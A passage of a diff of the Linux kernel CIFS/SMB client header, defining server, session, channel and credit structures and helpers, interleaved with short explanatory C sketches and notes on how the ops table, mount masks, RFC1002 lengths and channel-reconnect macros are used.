+-	int (*query_mf_symlink)(unsigned int, struct cifs_tcon *,
+-				struct cifs_sb_info *, const unsigned char *,
+-				char *, unsigned int *);
+-	int (*create_mf_symlink)(unsigned int, struct cifs_tcon *,
+-				 struct cifs_sb_info *, const unsigned char *,
+-				 char *, unsigned int *);
+-	/* whether we can do cached read operations */
+-	bool (*is_read_op)(__u32);
+-	/* set oplock level for the inode */
+-	void (*set_oplock_level)(struct cifsInodeInfo *, __u32, unsigned int,
+-				 bool *);
+-	/* create lease context buffer for CREATE request */
+-	char * (*create_lease_buf)(u8 *lease_key, u8 oplock);
+-	/* parse lease context buffer and return oplock/epoch info */
+-	__u8 (*parse_lease_buf)(void *buf, unsigned int *epoch, char *lkey);
+-	ssize_t (*copychunk_range)(const unsigned int,
+-			struct cifsFileInfo *src_file,
+-			struct cifsFileInfo *target_file,
+-			u64 src_off, u64 len, u64 dest_off);
+-	int (*duplicate_extents)(const unsigned int, struct cifsFileInfo *src,
+-			struct cifsFileInfo *target_file, u64 src_off, u64 len,
+-			u64 dest_off);
+-	int (*validate_negotiate)(const unsigned int, struct cifs_tcon *);
+-	ssize_t (*query_all_EAs)(const unsigned int, struct cifs_tcon *,
+-			const unsigned char *, const unsigned char *, char *,
+-			size_t, struct cifs_sb_info *);
+-	int (*set_EA)(const unsigned int, struct cifs_tcon *, const char *,
+-			const char *, const void *, const __u16,
+-			const struct nls_table *, struct cifs_sb_info *);
+-	struct cifs_ntsd * (*get_acl)(struct cifs_sb_info *, struct inode *,
+-			const char *, u32 *, u32);
+-	struct cifs_ntsd * (*get_acl_by_fid)(struct cifs_sb_info *,
+-			const struct cifs_fid *, u32 *, u32);
+-	int (*set_acl)(struct cifs_ntsd *, __u32, struct inode *, const char *,
+-			int);
+-	/* writepages retry size */
+-	unsigned int (*wp_retry_size)(struct inode *);
+-	/* get mtu credits */
+-	int (*wait_mtu_credits)(struct TCP_Server_Info *, unsigned int,
+-				unsigned int *, struct cifs_credits *);
+-	/* adjust previously taken mtu credits to request size */
+-	int (*adjust_credits)(struct TCP_Server_Info *server,
+-			      struct cifs_credits *credits,
+-			      const unsigned int payload_size);
+-	/* check if we need to issue closedir */
+-	bool (*dir_needs_close)(struct cifsFileInfo *);
+-	long (*fallocate)(struct file *, struct cifs_tcon *, int, loff_t,
+-			  loff_t);
+-	/* init transform request - used for encryption for now */
+-	int (*init_transform_rq)(struct TCP_Server_Info *, int num_rqst,
+-				 struct smb_rqst *, struct smb_rqst *);
+-	int (*is_transform_hdr)(void *buf);
+-	int (*receive_transform)(struct TCP_Server_Info *,
+-				 struct mid_q_entry **, char **, int *);
+-	enum securityEnum (*select_sectype)(struct TCP_Server_Info *,
+-			    enum securityEnum);
+-	int (*next_header)(char *);
+-	/* ioctl passthrough for query_info */
+-	int (*ioctl_query_info)(const unsigned int xid,
+-				struct cifs_tcon *tcon,
+-				struct cifs_sb_info *cifs_sb,
+-				__le16 *path, int is_dir,
+-				unsigned long p);
+-	/* make unix special files (block, char, fifo, socket) */
+-	int (*make_node)(unsigned int xid,
+-			 struct inode *inode,
+-			 struct dentry *dentry,
+-			 struct cifs_tcon *tcon,
+-			 const char *full_path,
+-			 umode_t mode,
+-			 dev_t device_number);
+-	/* version specific fiemap implementation */
+-	int (*fiemap)(struct cifs_tcon *tcon, struct cifsFileInfo *,
+-		      struct fiemap_extent_info *, u64, u64);
+-	/* version specific llseek implementation */
+-	loff_t (*llseek)(struct file *, struct cifs_tcon *, loff_t, int);
+-	/* Check for STATUS_IO_TIMEOUT */
+-	bool (*is_status_io_timeout)(char *buf);
+-	/* Check for STATUS_NETWORK_NAME_DELETED */
+-	void (*is_network_name_deleted)(char *buf, struct TCP_Server_Info *srv);
+-};
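
/*
 * A mock of how the per-dialect ops table above is consumed: callers
 * dispatch through the function pointers, guarding optional operations
 * with a NULL check (compare the llseek dispatch in cifs_llseek()
 * earlier in this patch).  Standalone illustrative fragment with
 * made-up minimal types, not the kernel's own code.
 */
#include <errno.h>
#include <stdio.h>

struct ops { int (*echo)(void *server); };
struct server { const struct ops *ops; };

static int do_echo(void *server) { return 0; }

static int server_echo(struct server *s)
{
	if (!s->ops->echo)		/* optional op: guard with NULL check */
		return -EOPNOTSUPP;
	return s->ops->echo(s);
}

int main(void)
{
	const struct ops smb2_ops = { .echo = do_echo };
	struct server srv = { .ops = &smb2_ops };

	printf("%d\n", server_echo(&srv));	/* 0 */
	return 0;
}
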
+-
+-struct smb_version_values {
+-	char		*version_string;
+-	__u16		protocol_id;
+-	__u32		req_capabilities;
+-	__u32		large_lock_type;
+-	__u32		exclusive_lock_type;
+-	__u32		shared_lock_type;
+-	__u32		unlock_lock_type;
+-	size_t		header_preamble_size;
+-	size_t		header_size;
+-	size_t		max_header_size;
+-	size_t		read_rsp_size;
+-	__le16		lock_cmd;
+-	unsigned int	cap_unix;
+-	unsigned int	cap_nt_find;
+-	unsigned int	cap_large_files;
+-	__u16		signing_enabled;
+-	__u16		signing_required;
+-	size_t		create_lease_size;
+-};
+-
+-#define HEADER_SIZE(server) (server->vals->header_size)
+-#define MAX_HEADER_SIZE(server) (server->vals->max_header_size)
+-#define HEADER_PREAMBLE_SIZE(server) (server->vals->header_preamble_size)
+-#define MID_HEADER_SIZE(server) (HEADER_SIZE(server) - 1 - HEADER_PREAMBLE_SIZE(server))
+-
+-/*
+- * CIFS superblock mount flags (mnt_cifs_flags) to consider when
+- * trying to reuse existing superblock for a new mount
+- */
+-#define CIFS_MOUNT_MASK (CIFS_MOUNT_NO_PERM | CIFS_MOUNT_SET_UID | \
+-			 CIFS_MOUNT_SERVER_INUM | CIFS_MOUNT_DIRECT_IO | \
+-			 CIFS_MOUNT_NO_XATTR | CIFS_MOUNT_MAP_SPECIAL_CHR | \
+-			 CIFS_MOUNT_MAP_SFM_CHR | \
+-			 CIFS_MOUNT_UNX_EMUL | CIFS_MOUNT_NO_BRL | \
+-			 CIFS_MOUNT_CIFS_ACL | CIFS_MOUNT_OVERR_UID | \
+-			 CIFS_MOUNT_OVERR_GID | CIFS_MOUNT_DYNPERM | \
+-			 CIFS_MOUNT_NOPOSIXBRL | CIFS_MOUNT_NOSSYNC | \
+-			 CIFS_MOUNT_FSCACHE | CIFS_MOUNT_MF_SYMLINKS | \
+-			 CIFS_MOUNT_MULTIUSER | CIFS_MOUNT_STRICT_IO | \
+-			 CIFS_MOUNT_CIFS_BACKUPUID | CIFS_MOUNT_CIFS_BACKUPGID | \
+-			 CIFS_MOUNT_UID_FROM_ACL | CIFS_MOUNT_NO_HANDLE_CACHE | \
+-			 CIFS_MOUNT_NO_DFS | CIFS_MOUNT_MODE_FROM_SID | \
+-			 CIFS_MOUNT_RO_CACHE | CIFS_MOUNT_RW_CACHE)
+-
+-/*
+- * Generic VFS superblock mount flags (s_flags) to consider when
+- * trying to reuse existing superblock for a new mount
+- */
+-#define CIFS_MS_MASK (SB_RDONLY | SB_MANDLOCK | SB_NOEXEC | SB_NOSUID | \
+-		      SB_NODEV | SB_SYNCHRONOUS)
+-
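/*
 * A sketch of how masks like CIFS_MOUNT_MASK and CIFS_MS_MASK above
 * get used when deciding whether an existing superblock can be reused
 * for a new mount: only the flag bits in the mask have to match.
 * Hypothetical helper with made-up flag values, not the kernel's own
 * cifs_match_super() logic verbatim.
 */
#include <stdio.h>

static int flags_compatible(unsigned int old_flags, unsigned int new_flags,
			    unsigned int mask)
{
	return (old_flags & mask) == (new_flags & mask);
}

int main(void)
{
	unsigned int mask = 0x3;	/* pretend only two flag bits matter */

	printf("%d\n", flags_compatible(0x7, 0x3, mask));	/* 1 */
	printf("%d\n", flags_compatible(0x1, 0x2, mask));	/* 0 */
	return 0;
}
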
+-struct cifs_mnt_data {
+-	struct cifs_sb_info *cifs_sb;
+-	struct smb3_fs_context *ctx;
+-	int flags;
+-};
+-
+-static inline unsigned int
+-get_rfc1002_length(void *buf)
+-{
+-	return be32_to_cpu(*((__be32 *)buf)) & 0xffffff;
+-}
+-
+-static inline void
+-inc_rfc1001_len(void *buf, int count)
+-{
+-	be32_add_cpu((__be32 *)buf, count);
+-}
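The two helpers above treat the first 4 bytes of every PDU as an RFC1002 session header: a type byte followed by a 24-bit big-endian length. A standalone user-space sketch of the same decoding, assuming a made-up header buffer:

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <arpa/inet.h>

int main(void)
{
	/* RFC1002 header: type byte 0x00, then 24-bit big-endian length */
	unsigned char hdr[4] = { 0x00, 0x00, 0x01, 0x02 };
	uint32_t len;

	memcpy(&len, hdr, sizeof(len));
	len = ntohl(len) & 0xffffff;		/* mirrors get_rfc1002_length() */
	printf("PDU length: %u\n", len);	/* prints 258 */
	return 0;
}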
+-
+-struct TCP_Server_Info {
+-	struct list_head tcp_ses_list;
+-	struct list_head smb_ses_list;
+-	spinlock_t srv_lock;  /* protect anything here that is not protected */
+-	__u64 conn_id; /* connection identifier (useful for debugging) */
+-	int srv_count; /* reference counter */
+-	/* 15 character server name + 0x20 16th byte indicating type = srv */
+-	char server_RFC1001_name[RFC1001_NAME_LEN_WITH_NULL];
+-	struct smb_version_operations	*ops;
+-	struct smb_version_values	*vals;
+-	/* updates to tcpStatus protected by cifs_tcp_ses_lock */
+-	enum statusEnum tcpStatus; /* what we think the status is */
+-	char *hostname; /* hostname portion of UNC string */
+-	struct socket *ssocket;
+-	struct sockaddr_storage dstaddr;
+-	struct sockaddr_storage srcaddr; /* locally bind to this IP */
+-#ifdef CONFIG_NET_NS
+-	struct net *net;
+-#endif
+-	wait_queue_head_t response_q;
+-	wait_queue_head_t request_q; /* if more than maxmpx to srvr must block*/
+-	spinlock_t mid_lock;  /* protect mid queue and its entries */
+-	struct list_head pending_mid_q;
+-	bool noblocksnd;		/* use blocking sendmsg */
+-	bool noautotune;		/* do not autotune send buf sizes */
+-	bool nosharesock;
+-	bool tcp_nodelay;
+-	unsigned int credits;  /* send no more requests at once */
+-	unsigned int max_credits; /* can override large 32000 default at mnt */
+-	unsigned int in_flight;  /* number of requests on the wire to server */
+-	unsigned int max_in_flight; /* max number of requests that were on wire */
+-	spinlock_t req_lock;  /* protect the two values above */
+-	struct mutex _srv_mutex;
+-	unsigned int nofs_flag;
+-	struct task_struct *tsk;
+-	char server_GUID[16];
+-	__u16 sec_mode;
+-	bool sign; /* is signing enabled on this connection? */
+-	bool ignore_signature:1; /* skip validation of signatures in SMB2/3 rsp */
+-	bool session_estab; /* mark when very first sess is established */
+-	int echo_credits;  /* echo reserved slots */
+-	int oplock_credits;  /* oplock break reserved slots */
+-	bool echoes:1; /* enable echoes */
+-	__u8 client_guid[SMB2_CLIENT_GUID_SIZE]; /* Client GUID */
+-	u16 dialect; /* dialect index that server chose */
+-	bool oplocks:1; /* enable oplocks */
+-	unsigned int maxReq;	/* Clients should submit no more */
+-	/* than maxReq distinct unanswered SMBs to the server when using  */
+-	/* multiplexed reads or writes (for SMB1/CIFS only, not SMB2/SMB3) */
+-	unsigned int maxBuf;	/* maxBuf specifies the maximum */
+-	/* message size the server can send or receive for non-raw SMBs */
+-	/* maxBuf is returned by SMB NegotiateProtocol so maxBuf is only 0 */
+-	/* when socket is setup (and during reconnect) before NegProt sent */
+-	unsigned int max_rw;	/* maxRw specifies the maximum */
+-	/* message size the server can send or receive for */
+-	/* SMB_COM_WRITE_RAW or SMB_COM_READ_RAW. */
+-	unsigned int capabilities; /* selective disabling of caps by smb sess */
+-	int timeAdj;  /* Adjust for difference in server time zone in sec */
+-	__u64 CurrentMid;         /* multiplex id - rotating counter, protected by GlobalMid_Lock */
+-	char cryptkey[CIFS_CRYPTO_KEY_SIZE]; /* used by ntlm, ntlmv2 etc */
+-	/* 16th byte of RFC1001 workstation name is always null */
+-	char workstation_RFC1001_name[RFC1001_NAME_LEN_WITH_NULL];
+-	__u32 sequence_number; /* for signing, protected by srv_mutex */
+-	__u32 reconnect_instance; /* incremented on each reconnect */
+-	struct session_key session_key;
+-	unsigned long lstrp; /* when we got last response from this server */
+-	struct cifs_secmech secmech; /* crypto sec mech functs, descriptors */
+-#define	CIFS_NEGFLAVOR_UNENCAP	1	/* wct == 17, but no ext_sec */
+-#define	CIFS_NEGFLAVOR_EXTENDED	2	/* wct == 17, ext_sec bit set */
+-	char	negflavor;	/* NEGOTIATE response flavor */
+-	/* extended security flavors that server supports */
+-	bool	sec_ntlmssp;		/* supports NTLMSSP */
+-	bool	sec_kerberosu2u;	/* supports U2U Kerberos */
+-	bool	sec_kerberos;		/* supports plain Kerberos */
+-	bool	sec_mskerberos;		/* supports legacy MS Kerberos */
+-	bool	large_buf;		/* is current buffer large? */
+-	/* use SMBD connection instead of socket */
+-	bool	rdma;
+-	/* point to the SMBD connection if RDMA is used instead of socket */
+-	struct smbd_connection *smbd_conn;
+-	struct delayed_work	echo; /* echo ping workqueue job */
+-	struct delayed_work	resolve; /* dns resolution workqueue job */
+-	char	*smallbuf;	/* pointer to current "small" buffer */
+-	char	*bigbuf;	/* pointer to current "big" buffer */
+-	/* Total size of this PDU. Only valid from cifs_demultiplex_thread */
+-	unsigned int pdu_size;
+-	unsigned int total_read; /* total amount of data read in this pass */
+-	atomic_t in_send; /* requests trying to send */
+-	atomic_t num_waiters;   /* blocked waiting to get in sendrecv */
+-#ifdef CONFIG_CIFS_STATS2
+-	atomic_t num_cmds[NUMBER_OF_SMB2_COMMANDS]; /* total requests by cmd */
+-	atomic_t smb2slowcmd[NUMBER_OF_SMB2_COMMANDS]; /* count resps > 1 sec */
+-	__u64 time_per_cmd[NUMBER_OF_SMB2_COMMANDS]; /* total time per cmd */
+-	__u32 slowest_cmd[NUMBER_OF_SMB2_COMMANDS];
+-	__u32 fastest_cmd[NUMBER_OF_SMB2_COMMANDS];
+-#endif /* STATS2 */
+-	unsigned int	max_read;
+-	unsigned int	max_write;
+-	unsigned int	min_offload;
+-	__le16	compress_algorithm;
+-	__u16	signing_algorithm;
+-	__le16	cipher_type;
+-	 /* save initial negprot hash */
+-	__u8	preauth_sha_hash[SMB2_PREAUTH_HASH_SIZE];
+-	bool	signing_negotiated; /* true if valid signing context rcvd from server */
+-	bool	posix_ext_supported;
+-	struct delayed_work reconnect; /* reconnect workqueue job */
+-	struct mutex reconnect_mutex; /* prevent simultaneous reconnects */
+-	unsigned long echo_interval;
+-
+-	/*
+-	 * Number of targets available for reconnect. The more targets
+-	 * the more tasks have to wait to let the demultiplex thread
+-	 * reconnect.
+-	 */
+-	int nr_targets;
+-	bool noblockcnt; /* use non-blocking connect() */
+-
+-	/*
+-	 * If this is a session channel,
+-	 * primary_server holds the ref-counted
+-	 * pointer to primary channel connection for the session.
+-	 */
+-#define CIFS_SERVER_IS_CHAN(server)	(!!(server)->primary_server)
+-	struct TCP_Server_Info *primary_server;
+-
+-#ifdef CONFIG_CIFS_SWN_UPCALL
+-	bool use_swn_dstaddr;
+-	struct sockaddr_storage swn_dstaddr;
+-#endif
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	bool is_dfs_conn; /* if a dfs connection */
+-	struct mutex refpath_lock; /* protects leaf_fullpath */
+-	/*
+-	 * Canonical DFS full paths that were used to chase referrals in mount and reconnect.
+-	 *
+-	 * origin_fullpath: first or original referral path
+-	 * leaf_fullpath: last referral path (might be changed due to nested links in reconnect)
+-	 *
+-	 * current_fullpath: pointer to either origin_fullpath or leaf_fullpath
+-	 * NOTE: cannot be accessed outside cifs_reconnect() and smb2_reconnect()
+-	 *
+-	 * format: \\HOST\SHARE\[OPTIONAL PATH]
+-	 */
+-	char *origin_fullpath, *leaf_fullpath, *current_fullpath;
+-#endif
+-};
+-
+-static inline bool is_smb1(struct TCP_Server_Info *server)
+-{
+-	return HEADER_PREAMBLE_SIZE(server) != 0;
+-}
+-
+-static inline void cifs_server_lock(struct TCP_Server_Info *server)
+-{
+-	unsigned int nofs_flag = memalloc_nofs_save();
+-
+-	mutex_lock(&server->_srv_mutex);
+-	server->nofs_flag = nofs_flag;
+-}
+-
+-static inline void cifs_server_unlock(struct TCP_Server_Info *server)
+-{
+-	unsigned int nofs_flag = server->nofs_flag;
+-
+-	mutex_unlock(&server->_srv_mutex);
+-	memalloc_nofs_restore(nofs_flag);
+-}
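The pairing above keeps the memalloc NOFS scope active for exactly as long as _srv_mutex is held, so allocations inside the critical section cannot recurse into the filesystem and deadlock. A minimal usage sketch, assuming server points at a live TCP_Server_Info:

cifs_server_lock(server);	/* memalloc_nofs_save() + mutex_lock() */
/* ... build and send a request; allocations here are implicitly GFP_NOFS ... */
cifs_server_unlock(server);	/* mutex_unlock() + memalloc_nofs_restore() */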
+-
+-struct cifs_credits {
+-	unsigned int value;
+-	unsigned int instance;
+-};
+-
+-static inline unsigned int
+-in_flight(struct TCP_Server_Info *server)
+-{
+-	unsigned int num;
+-	spin_lock(&server->req_lock);
+-	num = server->in_flight;
+-	spin_unlock(&server->req_lock);
+-	return num;
+-}
+-
+-static inline bool
+-has_credits(struct TCP_Server_Info *server, int *credits, int num_credits)
+-{
+-	int num;
+-	spin_lock(&server->req_lock);
+-	num = *credits;
+-	spin_unlock(&server->req_lock);
+-	return num >= num_credits;
+-}
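Callers pair has_credits() with the server's request_q wait queue to sleep until the server grants credits. A simplified sketch of that pattern; the real loop in transport.c also handles timeouts and reconnect states:

/* block until at least one send credit is available */
rc = wait_event_interruptible(server->request_q,
			      has_credits(server, &server->credits, 1));
if (rc)
	return rc;	/* -ERESTARTSYS: interrupted by a signal */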
+-
+-static inline void
+-add_credits(struct TCP_Server_Info *server, const struct cifs_credits *credits,
+-	    const int optype)
+-{
+-	server->ops->add_credits(server, credits, optype);
+-}
+-
+-static inline void
+-add_credits_and_wake_if(struct TCP_Server_Info *server,
+-			const struct cifs_credits *credits, const int optype)
+-{
+-	if (credits->value) {
+-		server->ops->add_credits(server, credits, optype);
+-		wake_up(&server->request_q);
+-	}
+-}
+-
+-static inline void
+-set_credits(struct TCP_Server_Info *server, const int val)
+-{
+-	server->ops->set_credits(server, val);
+-}
+-
+-static inline int
+-adjust_credits(struct TCP_Server_Info *server, struct cifs_credits *credits,
+-	       const unsigned int payload_size)
+-{
+-	return server->ops->adjust_credits ?
+-		server->ops->adjust_credits(server, credits, payload_size) : 0;
+-}
+-
+-static inline __le64
+-get_next_mid64(struct TCP_Server_Info *server)
+-{
+-	return cpu_to_le64(server->ops->get_next_mid(server));
+-}
+-
+-static inline __le16
+-get_next_mid(struct TCP_Server_Info *server)
+-{
+-	__u16 mid = server->ops->get_next_mid(server);
+-	/*
+-	 * The value in the SMB header should be little endian for easy
+-	 * on-the-wire decoding.
+-	 */
+-	return cpu_to_le16(mid);
+-}
+-
+-static inline void
+-revert_current_mid(struct TCP_Server_Info *server, const unsigned int val)
+-{
+-	if (server->ops->revert_current_mid)
+-		server->ops->revert_current_mid(server, val);
+-}
+-
+-static inline void
+-revert_current_mid_from_hdr(struct TCP_Server_Info *server,
+-			    const struct smb2_hdr *shdr)
+-{
+-	unsigned int num = le16_to_cpu(shdr->CreditCharge);
+-
+-	return revert_current_mid(server, num > 0 ? num : 1);
+-}
+-
+-static inline __u16
+-get_mid(const struct smb_hdr *smb)
+-{
+-	return le16_to_cpu(smb->Mid);
+-}
+-
+-static inline bool
+-compare_mid(__u16 mid, const struct smb_hdr *smb)
+-{
+-	return mid == le16_to_cpu(smb->Mid);
+-}
+-
+-/*
+- * When the server supports very large reads and writes via POSIX extensions,
+- * we can allow up to 2^24-1, minus the size of a READ/WRITE_AND_X header, not
+- * including the RFC1001 length.
+- *
+- * Note that this might make for "interesting" allocation problems during
+- * writeback however as we have to allocate an array of pointers for the
+- * pages. A 16M write means ~32kb page array with PAGE_SIZE == 4096.
+- *
+- * For reads, there is a similar problem as we need to allocate an array
+- * of kvecs to handle the receive, though that should only need to be done
+- * once.
+- */
+-#define CIFS_MAX_WSIZE ((1<<24) - 1 - sizeof(WRITE_REQ) + 4)
+-#define CIFS_MAX_RSIZE ((1<<24) - sizeof(READ_RSP) + 4)
+-
+-/*
+- * When the server doesn't allow large posix writes, only allow an rsize/wsize
+- * of 2^17-1 minus the size of the call header. That allows for a read or
+- * write up to the maximum size described by RFC1002.
+- */
+-#define CIFS_MAX_RFC1002_WSIZE ((1<<17) - 1 - sizeof(WRITE_REQ) + 4)
+-#define CIFS_MAX_RFC1002_RSIZE ((1<<17) - 1 - sizeof(READ_RSP) + 4)
+-
+-#define CIFS_DEFAULT_IOSIZE (1024 * 1024)
+-
+-/*
+- * Windows only supports a max of 60kb reads and 65535 byte writes. Default to
+- * those values when posix extensions aren't in force. In practice, we
+- * use 65536 to allow for a write that is a multiple of 4k. Most servers seem
+- * to be ok with the extra byte even though Windows doesn't send writes that
+- * are that large.
+- *
+- * Citation:
+- *
+- * https://blogs.msdn.com/b/openspecification/archive/2009/04/10/smb-maximum-transmit-buffer-size-and-performance-tuning.aspx
+- */
+-#define CIFS_DEFAULT_NON_POSIX_RSIZE (60 * 1024)
+-#define CIFS_DEFAULT_NON_POSIX_WSIZE (65536)
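A worked instance of the sizing math in the comments above, assuming PAGE_SIZE == 4096 and 8-byte pointers:

/*
 * 16M POSIX write:
 *   pages needed       = (16 << 20) / 4096      = 4096
 *   page pointer array = 4096 * sizeof(void *)  = 32768 bytes (~32kb)
 *
 * RFC1002-capped write:
 *   CIFS_MAX_RFC1002_WSIZE = (1 << 17) - 1 - sizeof(WRITE_REQ) + 4
 *                          = 131071 - sizeof(WRITE_REQ) + 4
 */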
+-
+-/*
+- * Macros to allow the TCP_Server_Info->net field and related code to drop out
+- * when CONFIG_NET_NS isn't set.
+- */
+-
+-#ifdef CONFIG_NET_NS
+-
+-static inline struct net *cifs_net_ns(struct TCP_Server_Info *srv)
+-{
+-	return srv->net;
+-}
+-
+-static inline void cifs_set_net_ns(struct TCP_Server_Info *srv, struct net *net)
+-{
+-	srv->net = net;
+-}
+-
+-#else
+-
+-static inline struct net *cifs_net_ns(struct TCP_Server_Info *srv)
+-{
+-	return &init_net;
+-}
+-
+-static inline void cifs_set_net_ns(struct TCP_Server_Info *srv, struct net *net)
+-{
+-}
+-
+-#endif
+-
+-struct cifs_server_iface {
+-	struct list_head iface_head;
+-	struct kref refcount;
+-	size_t speed;
+-	unsigned int rdma_capable : 1;
+-	unsigned int rss_capable : 1;
+-	unsigned int is_active : 1; /* unset if non-existent */
+-	struct sockaddr_storage sockaddr;
+-};
+-
+-/* release iface when last ref is dropped */
+-static inline void
+-release_iface(struct kref *ref)
+-{
+-	struct cifs_server_iface *iface = container_of(ref,
+-						       struct cifs_server_iface,
+-						       refcount);
+-	list_del_init(&iface->iface_head);
+-	kfree(iface);
+-}
+-
+-/*
+- * Compare two interfaces a and b:
+- * return 0 if everything matches,
+- * return 1 if a has a higher link speed, or is rdma capable, or is rss capable,
+- * return -1 otherwise.
+- */
+-static inline int
+-iface_cmp(struct cifs_server_iface *a, struct cifs_server_iface *b)
+-{
+-	int cmp_ret = 0;
+-
+-	WARN_ON(!a || !b);
+-	if (a->speed == b->speed) {
+-		if (a->rdma_capable == b->rdma_capable) {
+-			if (a->rss_capable == b->rss_capable) {
+-				cmp_ret = memcmp(&a->sockaddr, &b->sockaddr,
+-						 sizeof(a->sockaddr));
+-				if (!cmp_ret)
+-					return 0;
+-				else if (cmp_ret > 0)
+-					return 1;
+-				else
+-					return -1;
+-			} else if (a->rss_capable > b->rss_capable)
+-				return 1;
+-			else
+-				return -1;
+-		} else if (a->rdma_capable > b->rdma_capable)
+-			return 1;
+-		else
+-			return -1;
+-	} else if (a->speed > b->speed)
+-		return 1;
+-	else
+-		return -1;
+-}
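One way iface_cmp() can be used is to keep ses->iface_list sorted best-first, so channel allocation can walk it front to back. A hypothetical insertion helper under that assumption (iface_insert_sorted is invented for illustration; the caller would hold ses->iface_lock):

static void iface_insert_sorted(struct cifs_ses *ses,
				struct cifs_server_iface *new)
{
	struct cifs_server_iface *cur;

	list_for_each_entry(cur, &ses->iface_list, iface_head) {
		if (iface_cmp(new, cur) > 0) {
			/* new ranks higher, insert it before cur */
			list_add_tail(&new->iface_head, &cur->iface_head);
			return;
		}
	}
	list_add_tail(&new->iface_head, &ses->iface_list); /* worst: append */
}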
+-
+-struct cifs_chan {
+-	unsigned int in_reconnect : 1; /* if session setup in progress for this channel */
+-	struct TCP_Server_Info *server;
+-	struct cifs_server_iface *iface; /* interface in use */
+-	__u8 signkey[SMB3_SIGN_KEY_SIZE];
+-};
+-
+-/*
+- * Session structure.  One of these for each uid session with a particular host
+- */
+-struct cifs_ses {
+-	struct list_head smb_ses_list;
+-	struct list_head rlist; /* reconnect list */
+-	struct list_head tcon_list;
+-	struct cifs_tcon *tcon_ipc;
+-	spinlock_t ses_lock;  /* protect anything here that is not protected */
+-	struct mutex session_mutex;
+-	struct TCP_Server_Info *server;	/* pointer to server info */
+-	int ses_count;		/* reference counter */
+-	enum ses_status_enum ses_status;  /* updates protected by cifs_tcp_ses_lock */
+-	unsigned overrideSecFlg;  /* if non-zero override global sec flags */
+-	char *serverOS;		/* name of operating system underlying server */
+-	char *serverNOS;	/* name of network operating system of server */
+-	char *serverDomain;	/* security realm of server */
+-	__u64 Suid;		/* remote smb uid  */
+-	kuid_t linux_uid;	/* overriding owner of files on the mount */
+-	kuid_t cred_uid;	/* owner of credentials */
+-	unsigned int capabilities;
+-	char ip_addr[INET6_ADDRSTRLEN + 1]; /* Max ipv6 (or v4) addr string len */
+-	char *user_name;	/* must not be null except during sess init;
+-				   filled in after mount option parsing */
+-	char *domainName;
+-	char *password;
+-	char workstation_name[CIFS_MAX_WORKSTATION_LEN];
+-	struct session_key auth_key;
+-	struct ntlmssp_auth *ntlmssp; /* ciphertext, flags, server challenge */
+-	enum securityEnum sectype; /* what security flavor was specified? */
+-	bool sign;		/* is signing required? */
+-	bool domainAuto:1;
+-	__u16 session_flags;
+-	__u8 smb3signingkey[SMB3_SIGN_KEY_SIZE];
+-	__u8 smb3encryptionkey[SMB3_ENC_DEC_KEY_SIZE];
+-	__u8 smb3decryptionkey[SMB3_ENC_DEC_KEY_SIZE];
+-	__u8 preauth_sha_hash[SMB2_PREAUTH_HASH_SIZE];
+-
+-	/*
+-	 * Network interfaces available on the server this session is
+-	 * connected to.
+-	 *
+-	 * Other channels can be opened by connecting and binding this
+-	 * session to interfaces from this list.
+-	 *
+-	 * iface_lock should be taken when accessing any of these fields
+-	 */
+-	spinlock_t iface_lock;
+-	/* ========= begin: protected by iface_lock ======== */
+-	struct list_head iface_list;
+-	size_t iface_count;
+-	unsigned long iface_last_update; /* jiffies */
+-	/* ========= end: protected by iface_lock ======== */
+-
+-	spinlock_t chan_lock;
+-	/* ========= begin: protected by chan_lock ======== */
+-#define CIFS_MAX_CHANNELS 16
+-#define CIFS_ALL_CHANNELS_SET(ses)	\
+-	((1UL << (ses)->chan_count) - 1)
+-#define CIFS_ALL_CHANS_GOOD(ses)		\
+-	(!(ses)->chans_need_reconnect)
+-#define CIFS_ALL_CHANS_NEED_RECONNECT(ses)	\
+-	((ses)->chans_need_reconnect == CIFS_ALL_CHANNELS_SET(ses))
+-#define CIFS_SET_ALL_CHANS_NEED_RECONNECT(ses)	\
+-	((ses)->chans_need_reconnect = CIFS_ALL_CHANNELS_SET(ses))
+-#define CIFS_CHAN_NEEDS_RECONNECT(ses, index)	\
+-	test_bit((index), &(ses)->chans_need_reconnect)
+-#define CIFS_CHAN_IN_RECONNECT(ses, index)	\
+-	((ses)->chans[(index)].in_reconnect)
+-
+-	struct cifs_chan chans[CIFS_MAX_CHANNELS];
+-	size_t chan_count;
+-	size_t chan_max;
+-	atomic_t chan_seq; /* round robin state */
+-
+-	/*
+-	 * chans_need_reconnect is a bitmap indicating which of the channels
+-	 * under this smb session needs to be reconnected.
+-	 * If not multichannel session, only one bit will be used.
+-	 *
+-	 * We will ask for sess and tcon reconnection only if all the
+-	 * channels are marked for needing reconnection. This will
+-	 * enable the sessions on top to continue to live till any
+-	 * of the channels below are active.
+-	 */
+-	unsigned long chans_need_reconnect;
+-	/* ========= end: protected by chan_lock ======== */
+-};
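A sketch of how the channel macros above compose when deciding how much to reconnect (i, pending, and full_reconnect are locals invented for the example):

spin_lock(&ses->chan_lock);
for (i = 0; i < ses->chan_count; i++) {
	if (CIFS_CHAN_NEEDS_RECONNECT(ses, i))
		pending++;	/* channel i must be re-bound */
}
/* full session setup is needed only when every channel is down */
full_reconnect = CIFS_ALL_CHANS_NEED_RECONNECT(ses);
spin_unlock(&ses->chan_lock);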
+-
+-static inline bool
+-cap_unix(struct cifs_ses *ses)
+-{
+-	return ses->server->vals->cap_unix & ses->capabilities;
+-}
+-
+-/*
+- * common struct for holding inode info when searching for or updating an
+- * inode with new info
+- */
+-
+-#define CIFS_FATTR_DFS_REFERRAL		0x1
+-#define CIFS_FATTR_DELETE_PENDING	0x2
+-#define CIFS_FATTR_NEED_REVAL		0x4
+-#define CIFS_FATTR_INO_COLLISION	0x8
+-#define CIFS_FATTR_UNKNOWN_NLINK	0x10
+-#define CIFS_FATTR_FAKE_ROOT_INO	0x20
+-
+-struct cifs_fattr {
+-	u32		cf_flags;
+-	u32		cf_cifsattrs;
+-	u64		cf_uniqueid;
+-	u64		cf_eof;
+-	u64		cf_bytes;
+-	u64		cf_createtime;
+-	kuid_t		cf_uid;
+-	kgid_t		cf_gid;
+-	umode_t		cf_mode;
+-	dev_t		cf_rdev;
+-	unsigned int	cf_nlink;
+-	unsigned int	cf_dtype;
+-	struct timespec64 cf_atime;
+-	struct timespec64 cf_mtime;
+-	struct timespec64 cf_ctime;
+-	u32             cf_cifstag;
+-	char            *cf_symlink_target;
+-};
+-
+-/*
+- * there is one of these for each connection to a resource on a particular
+- * session
+- */
+-struct cifs_tcon {
+-	struct list_head tcon_list;
+-	int tc_count;
